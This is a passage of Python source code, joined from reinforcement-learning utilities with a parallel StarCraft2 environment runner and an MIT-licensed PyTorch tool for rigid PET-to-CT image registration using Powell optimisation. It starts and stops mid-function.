    act = list(agent.act.parameters())
    cri_optim = get_optim_parameters(agent.cri_optim)

    if agent.cri is agent.act:
        # Shared actor/critic: avoid sending the same net twice.
        cri = None
        act_optim = None
    else:
        cri = list(agent.cri.parameters())
        act_optim = get_optim_parameters(agent.act_optim)

    act_target = list(agent.act_target.parameters()) if agent.if_use_act_target else None
    cri_target = list(agent.cri_target.parameters()) if agent.if_use_cri_target else None

    return act, act_optim, cri, cri_optim, act_target, cri_target  # data
"""Utils"""
def get_step_r_exp(ten_reward):
    """Return (number of steps, mean reward) for a 1-D reward tensor."""
    step_num = len(ten_reward)
    r_exp = ten_reward.mean().item()
    return step_num, r_exp
def get_num_learner(visible_gpu):
    """Count GPUs in a CUDA_VISIBLE_DEVICES-style string.

    Arguments:
        visible_gpu(str): e.g. '0', '1', '1,', '1,2', '1,2,'.

    Returns:
        int: number of listed devices (at least 1).
    """
    assert isinstance(visible_gpu, str)  # visible_gpu may in {'0', '1', '1,', '1,2', '1,2,'}
    # Fix: parse the string instead of eval() -- eval on configuration input
    # is unsafe and only worked by accident of Python tuple syntax.
    gpu_ids = [item for item in visible_gpu.split(',') if item.strip()]
    return max(1, len(gpu_ids))
def process_safely_terminate(process):
    """Kill every process in `process`, logging (not raising) any OSError.

    Arguments:
        process: iterable of multiprocessing.Process-like objects with .kill().
    """
    for p in process:
        try:
            p.kill()
        except OSError as e:
            # Best effort: the process may already be gone.
            print(e)
def get_optim_parameters(optim):  # for avg_update_optim()
    """Collect every tensor stored in an optimizer's state dict (flat list)."""
    return [tensor
            for state in optim.state_dict()['state'].values()
            for tensor in state.values()
            if isinstance(tensor, torch.Tensor)]
def avg_update_optim(dst_optim, src_optim_param, device):
    """In place on dst_optim: average its state tensors with src_optim_param."""
    for dst_tensor, src_tensor in zip(get_optim_parameters(dst_optim), src_optim_param):
        dst_tensor.data.copy_((dst_tensor.data + src_tensor.data.to(device)) * 0.5)
def avg_update_net(dst_net, src_net_param, device):
    """In place on dst_net: average its parameters with src_net_param."""
    for dst_param, src_param in zip(dst_net.parameters(), src_net_param):
        dst_param.data.copy_((dst_param.data + src_param.data.to(device)) * 0.5)
from envs.starcraft import StarCraft2Env
from functools import partial
from train.replay_buffer import EpisodeBatch
from multiprocessing import Pipe, Process
import numpy as np
import torch as th
def env_fn1(env, **kwargs):
    """Instantiate `env` (a class or factory callable) with the given kwargs."""
    return env(**kwargs)
class ParallelRunner:
    """Runs `batch_size_run` StarCraft2 environments in parallel subprocesses
    and collects whole episodes into an EpisodeBatch."""

    def __init__(self, args, logger):
        self.args = args
        self.logger = logger
        self.batch_size = self.args.batch_size_run

        # Make subprocesses for the envs
        self.parent_conns, self.worker_conns = zip(*[Pipe() for _ in range(self.batch_size)])
        env_fn = partial(env_fn1, env=StarCraft2Env)
        self.ps = []
        for i, worker_conn in enumerate(self.worker_conns):
            # CloudpickleWrapper lets the partial (a closure) cross process boundaries.
            ps = Process(target=env_worker,
                         args=(worker_conn, CloudpickleWrapper(partial(env_fn, **self.args.env_args))))
            self.ps.append(ps)

        for p in self.ps:
            p.daemon = True
            p.start()

        # All envs share the same info; ask the first one.
        self.parent_conns[0].send(("get_env_info", None))
        self.env_info = self.parent_conns[0].recv()
        self.episode_limit = self.env_info["episode_limit"]

        self.t = 0        # timestep within the current episode
        self.t_env = 0    # total environment steps taken so far (training only)

        self.train_returns = []
        self.test_returns = []
        self.train_stats = {}
        self.test_stats = {}

        self.log_train_stats_t = -100000

    def setup(self, scheme, groups, preprocess, mac):
        """Store the batch template and the multi-agent controller (mac)."""
        # +1 timestep: the batch also stores the post-terminal observation.
        self.new_batch = partial(EpisodeBatch, scheme, groups, self.batch_size, self.episode_limit + 1,
                                 preprocess=preprocess, device=self.args.device)
        self.mac = mac
        self.scheme = scheme
        self.groups = groups
        self.preprocess = preprocess

    def get_env_info(self):
        return self.env_info

    def save_replay(self):
        # Not implemented for the parallel runner.
        pass

    def close_env(self):
        for parent_conn in self.parent_conns:
            parent_conn.send(("close", None))

    def reset(self):
        """Reset all envs and fill timestep 0 of a fresh batch."""
        self.batch = self.new_batch()

        # Reset the envs
        for parent_conn in self.parent_conns:
            parent_conn.send(("reset", None))

        pre_transition_data = {
            "state": [],
            "avail_actions": [],
            "obs": []
        }
        # Get the obs, state and avail_actions back
        for parent_conn in self.parent_conns:
            data = parent_conn.recv()
            pre_transition_data["state"].append(data["state"])
            pre_transition_data["avail_actions"].append(data["avail_actions"])
            pre_transition_data["obs"].append(data["obs"])

        self.batch.update(pre_transition_data, ts=0)

        self.t = 0
        self.env_steps_this_run = 0

    def run(self, test_mode=False):
        """Roll out one full episode in every parallel env; return the EpisodeBatch."""
        self.reset()

        all_terminated = False
        episode_returns = [0 for _ in range(self.batch_size)]
        episode_lengths = [0 for _ in range(self.batch_size)]
        self.mac.init_hidden(batch_size=self.batch_size)
        terminated = [False for _ in range(self.batch_size)]
        envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
        final_env_infos = []  # may store extra stats like battle won. this is filled in ORDER OF TERMINATION
        save_probs = getattr(self.args, "save_probs", False)
        while True:

            # Pass the entire batch of experiences up till now to the agents
            # Receive the actions for each agent at this timestep in a batch for each un-terminated env
            if save_probs:
                actions, probs = self.mac.select_actions(self.batch, t_ep=self.t, t_env=self.t_env, bs=envs_not_terminated, test_mode=test_mode)
            else:
                actions = self.mac.select_actions(self.batch, t_ep=self.t, t_env=self.t_env, bs=envs_not_terminated, test_mode=test_mode)

            cpu_actions = actions.to("cpu").numpy()

            # Update the actions taken
            actions_chosen = {
                "actions": actions.unsqueeze(1).to("cpu"),
            }
            if save_probs:
                actions_chosen["probs"] = probs.unsqueeze(1).to("cpu")

            self.batch.update(actions_chosen, bs=envs_not_terminated, ts=self.t, mark_filled=False)

            # Send actions to each env
            action_idx = 0
            for idx, parent_conn in enumerate(self.parent_conns):
                if idx in envs_not_terminated:  # We produced actions for this env
                    if not terminated[idx]:  # Only send the actions to the env if it hasn't terminated
                        parent_conn.send(("step", cpu_actions[action_idx]))
                    action_idx += 1  # actions is not a list over every env

            # Update envs_not_terminated
            envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
            all_terminated = all(terminated)
            if all_terminated:
                break

            # Post step data we will insert for the current timestep
            post_transition_data = {
                "reward": [],
                "terminated": []
            }
            # Data for the next step we will insert in order to select an action
            pre_transition_data = {
                "state": [],
                "avail_actions": [],
                "obs": []
            }

            # Receive data back for each unterminated env
            for idx, parent_conn in enumerate(self.parent_conns):
                if not terminated[idx]:
                    data = parent_conn.recv()
                    # Remaining data for this current timestep
                    post_transition_data["reward"].append((data["reward"],))

                    episode_returns[idx] += data["reward"]
                    episode_lengths[idx] += 1
                    if not test_mode:
                        self.env_steps_this_run += 1

                    # Episode-limit terminations are not "real" terminations
                    # for bootstrapping purposes.
                    env_terminated = False
                    if data["terminated"]:
                        final_env_infos.append(data["info"])
                    if data["terminated"] and not data["info"].get("episode_limit", False):
                        env_terminated = True
                    terminated[idx] = data["terminated"]
                    post_transition_data["terminated"].append((env_terminated,))

                    # Data for the next timestep needed to select an action
                    pre_transition_data["state"].append(data["state"])
                    pre_transition_data["avail_actions"].append(data["avail_actions"])
                    pre_transition_data["obs"].append(data["obs"])

            # Add post_transiton data into the batch
            self.batch.update(post_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=False)

            # Move onto the next timestep
            self.t += 1

            # Add the pre-transition data
            self.batch.update(pre_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=True)

        if not test_mode:
            self.t_env += self.env_steps_this_run

        # Get stats back for each env
        for parent_conn in self.parent_conns:
            parent_conn.send(("get_stats",None))

        env_stats = []
        for parent_conn in self.parent_conns:
            env_stat = parent_conn.recv()
            env_stats.append(env_stat)

        cur_stats = self.test_stats if test_mode else self.train_stats
        cur_returns = self.test_returns if test_mode else self.train_returns
        log_prefix = "test_" if test_mode else ""
        # Accumulate per-episode infos into the running stats dict.
        infos = [cur_stats] + final_env_infos
        cur_stats.update({k: sum(d.get(k, 0) for d in infos) for k in set.union(*[set(d) for d in infos])})
        cur_stats["n_episodes"] = self.batch_size + cur_stats.get("n_episodes", 0)
        cur_stats["ep_length"] = sum(episode_lengths) + cur_stats.get("ep_length", 0)

        cur_returns.extend(episode_returns)

        n_test_runs = max(1, self.args.test_nepisode // self.batch_size) * self.batch_size
        if test_mode and (len(self.test_returns) == n_test_runs):
            self._log(cur_returns, cur_stats, log_prefix)
        elif self.t_env - self.log_train_stats_t >= self.args.runner_log_interval:
            self._log(cur_returns, cur_stats, log_prefix)
            if hasattr(self.mac.action_selector, "epsilon"):
                self.logger.log_stat("epsilon", self.mac.action_selector.epsilon, self.t_env)
            self.log_train_stats_t = self.t_env

        return self.batch

    def _log(self, returns, stats, prefix):
        """Log mean/std of returns and per-episode means of stats, then clear both."""
        self.logger.log_stat(prefix + "return_mean", np.mean(returns), self.t_env)
        self.logger.log_stat(prefix + "return_std", np.std(returns), self.t_env)
        returns.clear()

        for k, v in stats.items():
            if k != "n_episodes":
                self.logger.log_stat(prefix + k + "_mean" , v/stats["n_episodes"], self.t_env)
        stats.clear()
def env_worker(remote, env_fn):
    """Subprocess loop: owns one environment and serves commands over `remote`.

    Supported commands: step / reset / close / get_env_info / get_stats.
    `env_fn` is a CloudpickleWrapper around the environment factory.
    """
    # Make environment
    env = env_fn.x()
    while True:
        cmd, data = remote.recv()
        if cmd == "step":
            actions = data
            # Take a step in the environment
            reward, terminated, env_info = env.step(actions)
            # Return the observations, avail_actions and state to make the next action
            state = env.get_state()
            avail_actions = env.get_avail_actions()
            obs = env.get_obs()
            remote.send({
                # Data for the next timestep needed to pick an action
                "state": state,
                "avail_actions": avail_actions,
                "obs": obs,
                # Rest of the data for the current timestep
                "reward": reward,
                "terminated": terminated,
                "info": env_info
            })
        elif cmd == "reset":
            env.reset()
            remote.send({
                "state": env.get_state(),
                "avail_actions": env.get_avail_actions(),
                "obs": env.get_obs()
            })
        elif cmd == "close":
            # Shut down the environment and exit the worker loop.
            env.close()
            remote.close()
            break
        elif cmd == "get_env_info":
            remote.send(env.get_env_info())
        elif cmd == "get_stats":
            remote.send(env.get_stats())
        else:
            raise NotImplementedError
class CloudpickleWrapper():
    """
    Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle).

    cloudpickle can serialize lambdas/closures; its output is standard
    pickle data, so plain pickle suffices on the receiving side.
    """

    def __init__(self, x):
        self.x = x

    def __getstate__(self):
        import cloudpickle
        return cloudpickle.dumps(self.x)

    def __setstate__(self, ob):
        import pickle
        self.x = pickle.loads(ob)
|
powell_torch.py | # /******************************************
# *MIT License
# *
# *Copyright (c) [2021] [Eleonora D'Arnese, Emanuele Del Sozzo, Davide Conficconi, Marco Domenico Santambrogio]
# *
# *Permission is hereby granted, free of charge, to any person obtaining a copy
# *of this software and associated documentation files (the "Software"), to deal
# *in the Software without restriction, including without limitation the rights
# *to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# *copies of the Software, and to permit persons to whom the Software is
# *furnished to do so, subject to the following conditions:
# *
# *The above copyright notice and this permission notice shall be included in all
# *copies or substantial portions of the Software.
# *
# *THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# *IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# *FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# *AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# *LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# *OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# *SOFTWARE.
# ******************************************/
import os
import pydicom
import cv2
import numpy as np
import math
import glob
import time
import pandas as pd
from torch.multiprocessing import Pool, Process, set_start_method
import struct
import statistics
import argparse
import kornia
import torch
# Module-level state configured by driver code outside this chunk.
compute_metric = None      # presumably the similarity-metric callable -- set elsewhere, confirm
precompute_metric = None   # presumably reference-side metric precomputation -- set elsewhere, confirm
device = "cpu"             # torch device string used by the helpers in this module
ref_vals = None            # precomputed reference values (set by the driver)
move_data = None           # data-placement function (no_transfer or to_cuda)
def no_transfer(input_data):
    """Identity data-placement function: leave the data where it is (CPU path)."""
    return input_data
def to_cuda(input_data):
    """Data-placement function: move a tensor to the CUDA device asynchronously."""
    return input_data.cuda(non_blocking=True)
def batch_transform(images, pars):
    """Apply a batch of 2x3 affine matrices to a batch of images (nearest-neighbour)."""
    height, width = images.shape[2], images.shape[3]
    return kornia.geometry.warp_affine(images, pars, mode="nearest", dsize=(height, width))
def transform(image, par):
    """Warp a single 2-D image by one 2x3 affine matrix (adds batch/channel dims)."""
    batched_img = image.reshape((1, 1, *image.shape)).float()
    batched_par = torch.unsqueeze(par, dim=0)
    return kornia.geometry.warp_affine(batched_img, batched_par, mode="nearest",
                                       dsize=(batched_img.shape[2], batched_img.shape[3]))
def compute_moments(img):
    """Compute raw image moments (m00, m10, m20, m01, m02, m11) of a 2-D tensor.

    Uses the module-level `device` global for the output tensor.
    NOTE(review): `l` has length img.shape[0] but is broadcast along both
    axes, so this assumes a square image -- confirm with the callers.
    """
    moments = torch.empty(6, device=device)
    l = torch.arange(img.shape[0], device=device)
    moments[0] = torch.sum(img)  # m00
    moments[1] = torch.sum(img * l)  # m10
    moments[2] = torch.sum(img * (l**2))  # m20
    moments[3] = torch.sum(img * l.reshape((img.shape[0], 1)) )  # m01
    moments[4] = torch.sum(img * (l.reshape((img.shape[0], 1)))**2 )  # m02
    moments[5] = torch.sum(img * l * l.reshape((img.shape[0], 1)))  # m11
    return moments
def to_matrix_blocked(vector_params):
    """Expand (tx, ty, cos_theta) into a 2x3 rigid-transform matrix.

    A cos_theta outside [-1, 1] is replaced by the identity rotation, so a
    wandering optimizer can never produce an invalid rotation ("blocked").
    """
    cos_t = vector_params[2]
    mat = torch.empty((2, 3))
    mat[0][2] = vector_params[0]   # tx
    mat[1][2] = vector_params[1]   # ty
    if -1 <= cos_t <= 1:
        sin_t = torch.sqrt(1 - (cos_t ** 2))
        mat[0][0] = cos_t
        mat[1][1] = cos_t
        mat[0][1] = sin_t
        mat[1][0] = -sin_t
    else:
        # Out-of-range cosine: fall back to the identity rotation.
        mat[0][0] = 1
        mat[1][1] = 1
        mat[0][1] = 0
        mat[1][0] = 0
    return mat
def estimate_initial(Ref_uint8, Flt_uint8, params):
    """Initialise *params* (2x3 affine) in place from image moments.

    Translation comes from the centroid offset; the rotation from the
    principal-axis angle difference, applied only when the floating image
    is elongated enough (roundness far from 1) for that angle to be stable.
    Returns the mutated params tensor.
    """
    ref_mom = compute_moments(Ref_uint8)
    flt_mom = compute_moments(Flt_uint8)

    def _centroid_and_central(mom):
        # (mean_x, mean_y, mu20, mu02, mu11) derived from raw moments.
        avg10 = mom[1] / mom[0]
        avg01 = mom[3] / mom[0]
        mu20 = (mom[2] / mom[0] * 1.0) - (avg10 * avg10)
        mu02 = (mom[4] / mom[0] * 1.0) - (avg01 * avg01)
        mu11 = (mom[5] / mom[0] * 1.0) - (avg01 * avg10)
        return avg10, avg01, mu20, mu02, mu11

    f10, f01, f20, f02, f11 = _centroid_and_central(flt_mom)
    r10, r01, r20, r02, r11 = _centroid_and_central(ref_mom)
    # Translation: centroid difference between reference and floating.
    params[0][2] = r10 - f10
    params[1][2] = r01 - f01
    # Principal-axis angles and their difference.
    rho_flt = 0.5 * torch.atan((2.0 * f11) / (f20 - f02))
    rho_ref = 0.5 * torch.atan((2.0 * r11) / (r20 - r02))
    delta_rho = rho_ref - rho_flt
    roundness = (flt_mom[2] / flt_mom[0]) / (flt_mom[4] / flt_mom[0])
    if torch.abs(roundness - 1.0) >= 0.3:
        cos_d = torch.cos(delta_rho)
        sin_d = torch.sin(delta_rho)
        params[0][0] = cos_d
        params[0][1] = -sin_d
        params[1][0] = sin_d
        params[1][1] = cos_d
    else:
        # Nearly round blob: the axis angle is unreliable, keep identity.
        params[0][0] = 1.0
        params[0][1] = 0.0
        params[1][0] = 0.0
        params[1][1] = 1.0
    return (params)
def my_squared_hist2d_t(sample, bins, smin, smax):
    """2-D histogram of a (2, N) sample over [smin, smax] on the module `device`.

    Mirrors numpy's histogramdd binning: one overflow bin is kept at each
    end during counting and stripped before returning the (bins, bins) grid.
    """
    D, N = sample.shape
    edges = torch.linspace(smin, smax, bins + 1, device=device)
    nbin = edges.shape[0] + 1
    # Compute the bin number each sample falls into.
    Ncount = D*[None]
    for i in range(D):
        Ncount[i] = torch.searchsorted(edges, sample[i, :], right=True)
    # Using digitize, values that fall on an edge are put in the right bin.
    # For the rightmost bin, we want values equal to the right edge to be
    # counted in the last bin, and not as an outlier.
    for i in range(D):
        # Find which points are on the rightmost edge.
        on_edge = (sample[i, :] == edges[-1])
        # Shift these points one bin to the left.
        Ncount[i][on_edge] -= 1
    # Compute the sample indices in the flattened histogram matrix.
    xy = Ncount[0]*nbin+Ncount[1]
    # Compute the number of repetitions in xy and assign it to the
    # flattened histogram (bincount does the counting at C speed).
    hist = torch.bincount(xy, None, minlength=nbin*nbin)
    # Shape into a proper matrix
    hist = hist.reshape((nbin, nbin))
    hist = hist.float()
    # Remove outliers (indices 0 and -1 for each dimension).
    hist = hist[1:-1,1:-1]
    return hist
def precompute_mutual_information(Ref_uint8_ravel):
    """Shannon entropy (bits) of the reference intensity histogram.

    Computed once per slice and reused by every mutual_information() call.
    """
    hist = torch.histc(Ref_uint8_ravel, bins=256) / Ref_uint8_ravel.numel()
    # Drop empty bins so 0*log2(0) never appears (treated as 0).
    hist = hist[hist > 0.000000000000001]
    return -torch.sum(hist * torch.log2(hist))
def mutual_information(Ref_uint8_ravel, Flt_uint8_ravel, eref):
    """Mutual information between reference and floating intensity vectors.

    `eref` is the precomputed reference entropy. The joint histogram is
    sized by the module-level `hist_dim` (256); on CUDA the module-level
    `ref_vals` ones-vector (sized in compute()) supplies the scatter weights.
    """
    if(device == "cuda"):
        # Scatter-add ones into a sparse (hist_dim, hist_dim) tensor: a
        # GPU-side joint histogram. NOTE(review): torch.sparse.IntTensor is
        # a legacy constructor — verify against the installed torch version.
        idx_joint = torch.stack((Ref_uint8_ravel, Flt_uint8_ravel)).long()
        j_h_init = torch.sparse.IntTensor(idx_joint, ref_vals, torch.Size([hist_dim, hist_dim])).to_dense()/Ref_uint8_ravel.numel()
    else:
        idx_joint = torch.stack((Ref_uint8_ravel, Flt_uint8_ravel))
        j_h_init = my_squared_hist2d_t(idx_joint, hist_dim, 0, 255)/Ref_uint8_ravel.numel()
    # Joint entropy over non-empty bins only (0*log2(0) treated as 0).
    j_h = j_h_init[j_h_init>0.000000000000001]
    entropy=(torch.sum(j_h*(torch.log2(j_h))))*-1
    # Marginal entropy of the floating image from the joint histogram.
    hflt=torch.sum(j_h_init,axis=0)
    hflt=hflt[hflt>0.000000000000001]
    eflt=(torch.sum(hflt*(torch.log2(hflt))))*-1
    # MI = H(ref) + H(flt) - H(ref, flt)
    mutualinfo=eref+eflt-entropy
    return(mutualinfo)
def precompute_cross_correlation(Ref_uint8_ravel):
    """Reference auto-correlation term sum(ref*ref), computed once per slice."""
    return (Ref_uint8_ravel * Ref_uint8_ravel).sum()
def cross_correlation(Ref_uint8_ravel, Flt_uint8_ravel, cc_ref):
    """Negated normalised cross-correlation (lower is better for a minimiser).

    `cc_ref` is the precomputed sum(ref*ref) term.
    """
    numerator = torch.sum(Ref_uint8_ravel * Flt_uint8_ravel)
    cc_flt = torch.sum(Flt_uint8_ravel * Flt_uint8_ravel)
    return -numerator / torch.sqrt(cc_ref * cc_flt)
def precompute_mean_squared_error(Ref_uint8_ravel):
    """MSE needs no precomputed reference term; hook kept for API symmetry."""
    return None
def mean_squared_error(Ref_uint8_ravel, Flt_uint8_ravel, mse_ref):
    """Squared intensity difference between the two vectors (mse_ref unused).

    NOTE(review): despite the name this is the *sum* of squared errors, not
    the mean — fine for optimisation since the scale factor is constant.
    """
    diff = Ref_uint8_ravel - Flt_uint8_ravel
    return torch.sum(diff ** 2)
def compute_mi(ref_img, flt_imgs, t_mats, eref):
    """Warp both candidate floats and score each with exp(-MI).

    exp(-MI) turns the maximisation of MI into a minimisation, matching the
    other metric hooks; results are moved to the CPU for the optimizer.
    """
    warped = batch_transform(flt_imgs, t_mats)
    scores = [torch.exp(-mutual_information(ref_img, warped[k].ravel(), eref)).cpu()
              for k in (0, 1)]
    return scores[0], scores[1]
def compute_cc(ref_img, flt_imgs, t_mats, cc_ref):
    """Warp both candidate floats and score each with negated NCC (CPU tensors)."""
    warped = batch_transform(flt_imgs, t_mats)
    scores = [cross_correlation(ref_img, warped[k].ravel(), cc_ref).cpu()
              for k in (0, 1)]
    return scores[0], scores[1]
def compute_mse(ref_img, flt_imgs, t_mats, mse_ref):
    """Warp both candidate floats and score each with squared error (CPU tensors)."""
    warped = batch_transform(flt_imgs, t_mats)
    scores = [mean_squared_error(ref_img, warped[k].ravel(), mse_ref).cpu()
              for k in (0, 1)]
    return scores[0], scores[1]
def optimize_goldsearch(par, rng, ref_sup_ravel, flt_stack, linear_par, i, eref):
    """Golden-section line search over coordinate *i* of linear_par.

    Evaluates the two golden-ratio interior points of the bracket in a
    single batched metric call per iteration and keeps the half-interval
    with the lower (better) score. Mutates linear_par[i] while probing.
    Returns (bracket midpoint, best score seen).
    """
    # Initial bracket around the current parameter value.
    start=par-0.382*rng
    end=par+0.618*rng
    c=(end-(end-start)/1.618)
    d=(start+(end-start)/1.618)
    best_mi = 0.0
    while(math.fabs(c-d)>0.005):
        # Build the two candidate transforms sharing all other coordinates.
        linear_par[i]=c
        a_mat=to_matrix_blocked(linear_par)
        linear_par[i]=d
        b_mat=to_matrix_blocked(linear_par)
        mats = move_data(torch.stack((a_mat, b_mat)))
        mi_a, mi_b = compute_metric(ref_sup_ravel, flt_stack, mats, eref)
        if(mi_a < mi_b):
            end=d
            best_mi = mi_a
            linear_par[i]=c
        else:
            start=c
            best_mi = mi_b
            linear_par[i]=d
        c=(end-(end-start)/1.618)
        d=(start+(end-start)/1.618)
    # NOTE(review): if the initial bracket is already below tolerance the
    # loop never runs and best_mi is returned as 0.0, not a measured score.
    return (end+start)/2, best_mi
def optimize_powell(rng, par_lin, ref_sup_ravel, flt_stack, eref):
    """Powell-style coordinate descent over the three rigid parameters.

    Repeats a golden-section line search along each coordinate; a proposal
    is accepted only if it improves the best score by more than `eps`.
    Converges when a full sweep accepts nothing. Mutates and returns par_lin.
    """
    converged = False
    eps = 0.000005
    last_mut=100000.0     # best (lowest) metric score seen so far
    it=0
    while(not converged):
        converged=True
        it=it+1
        for i in range(par_lin.numel()):
            cur_par = par_lin[i]
            cur_rng = rng[i]
            param_opt, cur_mi = optimize_goldsearch(cur_par, cur_rng, ref_sup_ravel, flt_stack, par_lin, i, eref)
            # Restore the coordinate the line search mutated before deciding.
            par_lin[i]=cur_par
            if last_mut-cur_mi>eps:
                # Improvement: accept the proposal and keep sweeping.
                par_lin[i]=param_opt
                last_mut=cur_mi
                converged=False
            else:
                par_lin[i]=cur_par
    #print("Iterations "+str(it))
    return (par_lin)
def register_images(Ref_uint8, Flt_uint8):
    """Rigid-register the floating slice onto the reference slice.

    Moment-based initialisation followed by Powell refinement of
    (tx, ty, cos_theta); returns the warped floating image as produced
    by transform() (a (1, 1, H, W) float tensor).
    """
    init = torch.empty((2, 3), device=device)
    estimate_initial(Ref_uint8, Flt_uint8, init)
    init_cpu = init.cpu()
    search_range = torch.tensor([80.0, 80.0, 1.0])   # tx, ty, cos_theta brackets
    lin_params = torch.tensor([init_cpu[0][2], init_cpu[1][2], init_cpu[0][0]])
    ref_ravel = Ref_uint8.ravel().double()
    ref_term = precompute_metric(ref_ravel)
    # Stack the floating image twice so both line-search candidates are
    # warped in one batched call.
    flt_batched = torch.unsqueeze(Flt_uint8, dim=0).float()
    flt_pair = torch.stack((flt_batched, flt_batched))
    best = optimize_powell(search_range, lin_params, ref_ravel, flt_pair, ref_term)
    return transform(Flt_uint8, move_data(to_matrix_blocked(best)))
def save_data(OUT_STAK, name, res_path):
    """Write each registered slice to *res_path* as an 8-bit PNG.

    The output name is derived from the source file name: the first two
    characters plus the integer value of characters 2-4 (zero-padding
    stripped), e.g. 'PT00042.dcm' -> 'PT42.png'.

    Fix: use os.path instead of splitting on '/', which broke on Windows
    paths and on names without a directory component.
    """
    for i in range(len(OUT_STAK)):
        stem = os.path.splitext(os.path.basename(name[i]))[0]
        out_name = stem[0:2] + str(int(stem[2:5])) + '.png'
        cv2.imwrite(os.path.join(res_path, out_name),
                    kornia.tensor_to_image(OUT_STAK[i].cpu().byte()))
def compute(CT, PET, name, curr_res, t_id, patient_id):
    """Register each PET slice onto its paired CT slice; save images and timings.

    Runs inside a worker process. CT/PET are equal-length lists of DICOM
    paths, curr_res the output folder, t_id the worker index (used in CSV
    file names), patient_id the patient number (used in CSV column names).
    """
    final_img=[]
    times=[]
    t = 0.0
    it_time = 0.0
    hist_dim = 256  # NOTE(review): local and unused — mutual_information reads the module-level hist_dim
    dim = 512       # slice side length; sizes the sparse-histogram weight vector below
    global ref_vals
    ref_vals = torch.ones(dim*dim, dtype=torch.int, device=device)
    global move_data
    # Pick the host->device transfer strategy once, based on the device.
    move_data = no_transfer if device=="cpu" else to_cuda
    for c,ij in enumerate(zip(CT, PET)):
        i = ij[0]
        j = ij[1]
        ref = pydicom.dcmread(i)
        Ref_img = torch.tensor(ref.pixel_array.astype(np.int16), dtype=torch.int16, device=device)
        # -2000 marks out-of-scan pixels in CT; clamp before normalising.
        Ref_img[Ref_img==-2000]=1
        flt = pydicom.dcmread(j)
        Flt_img = torch.tensor(flt.pixel_array.astype(np.int16), dtype=torch.int16, device=device)
        # Min-max normalise both slices to the 8-bit intensity range.
        Ref_img = (Ref_img - Ref_img.min())/(Ref_img.max() - Ref_img.min())*255
        Ref_uint8 = Ref_img.round().type(torch.uint8)
        Flt_img = (Flt_img - Flt_img.min())/(Flt_img.max() - Flt_img.min())*255
        Flt_uint8 = Flt_img.round().type(torch.uint8)
        # Time only the registration itself, not the DICOM I/O.
        start_time = time.time()
        f_img = register_images(Ref_uint8, Flt_uint8)
        end_time= time.time()
        final_img.append(f_img.cpu())
        it_time = (end_time - start_time)
        times.append(it_time)
        t=t+it_time
    # Persist total/mean/std and the per-image timings for this worker.
    df = pd.DataFrame([t, np.mean(times), np.std(times)],columns=['Test'+str(patient_id)])#+str(config)accel_id.get_config())])
    times_df = pd.DataFrame(times,columns=['Test'+str(patient_id)])#+str(config)accel_id.get_config())])
    df_path = os.path.join(curr_res,'Time_powll_%02d.csv' % (t_id))
    times_df_path = os.path.join(curr_res,'Img_powll_%02d.csv' % (t_id))
    df.to_csv(df_path, index=False)
    times_df.to_csv(times_df_path, index=False)
    save_data(final_img,PET,curr_res)
def compute_wrapper(args, num_threads=1):
    """Fan each patient's slice pairs out across worker processes.

    For every patient index in [args.offset, args.patient), pairs the
    sorted CT and PET DICOM file lists, partitions them into num_threads
    contiguous chunks and registers each chunk in its own process.

    Fix: dropped the unused local `config = args.config`.
    """
    for k in range(args.offset, args.patient):
        pool = []
        curr_prefix = args.prefix+str(k)
        curr_ct = os.path.join(curr_prefix,args.ct_path)
        curr_pet = os.path.join(curr_prefix,args.pet_path)
        curr_res = os.path.join("",args.res_path)
        os.makedirs(curr_res,exist_ok=True)
        CT=glob.glob(curr_ct+'/*dcm')
        PET=glob.glob(curr_pet+'/*dcm')
        # Sort both lists so slice i of CT pairs with slice i of PET.
        PET.sort()
        CT.sort()
        assert len(CT) == len(PET)
        images_per_thread = len(CT) // num_threads
        print(images_per_thread)
        for i in range(num_threads):
            start = images_per_thread * i
            # The last worker absorbs the remainder of the division.
            end = images_per_thread * (i + 1) if i < num_threads - 1 else len(CT)
            name = "t%02d" % (i)
            pool.append(Process(target=compute, args=(CT[start:end], PET[start:end], name, curr_res, i, k)))
        for t in pool:
            t.start()
        for t in pool:
            t.join()
# Joint-histogram size (intensity levels) read by mutual_information().
hist_dim = 256
# Default square-slice side length, matching the 512x512 DICOM slices.
dim = 512
def main():
    """CLI entry point: parse arguments, bind metric/device globals, run."""
    parser = argparse.ArgumentParser(description='Iron software for IR onto a python env')
    parser.add_argument("-pt", "--patient", nargs='?', help='Number of the patient to analyze', default=1, type=int)
    parser.add_argument("-o", "--offset", nargs='?', help='Starting patient to analyze', default=0, type=int)
    parser.add_argument("-cp", "--ct_path", nargs='?', help='Path of the CT Images', default='./')
    parser.add_argument("-pp", "--pet_path", nargs='?', help='Path of the PET Images', default='./')
    parser.add_argument("-rp", "--res_path", nargs='?', help='Path of the Results', default='./')
    parser.add_argument("-t", "--thread_number", nargs='?', help='Number of // threads', default=1, type=int)
    parser.add_argument("-px", "--prefix", nargs='?', help='prefix Path of patients folder', default='./')
    parser.add_argument("-im", "--image_dimension", nargs='?', help='Target images dimensions', default=512, type=int)
    parser.add_argument("-c", "--config", nargs='?', help='prefix Path of patients folder', default='./')
    parser.add_argument("-mtr", "--metric", nargs='?', help='Metric accelerator to be tested', choices=['MI', 'CC', 'MSE'], default='MI')
    parser.add_argument("-dvc", "--device", nargs='?', help='Target device', choices=['cpu', 'cuda'], default='cpu')
    args = parser.parse_args()
    num_threads = args.thread_number
    patient_number = args.patient
    print(args.config)
    print(args)
    # Bind the metric hooks via a dispatch table instead of an if/elif chain.
    metric_table = {
        'MI': (compute_mi, precompute_mutual_information),
        'CC': (compute_cc, precompute_cross_correlation),
        'MSE': (compute_mse, precompute_mean_squared_error),
    }
    global compute_metric, precompute_metric
    if args.metric in metric_table:
